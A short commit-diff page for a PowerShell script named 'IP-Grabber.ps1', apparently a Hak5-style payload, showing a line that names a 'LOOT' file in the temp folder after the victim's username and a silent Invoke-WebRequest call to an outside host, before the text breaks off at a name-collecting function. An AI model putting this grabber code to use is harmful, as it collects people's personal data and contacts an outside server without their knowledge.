Update IP-Grabber.ps1
This commit is contained in:
parent
1060c313fe
commit
2575e78c54
1 changed files with 1 additions and 1 deletions
|
@ -1,5 +1,5 @@
|
|||
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
|
||||
|
||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-fullName {
|
||||
|
|
Loading…
Reference in a new issue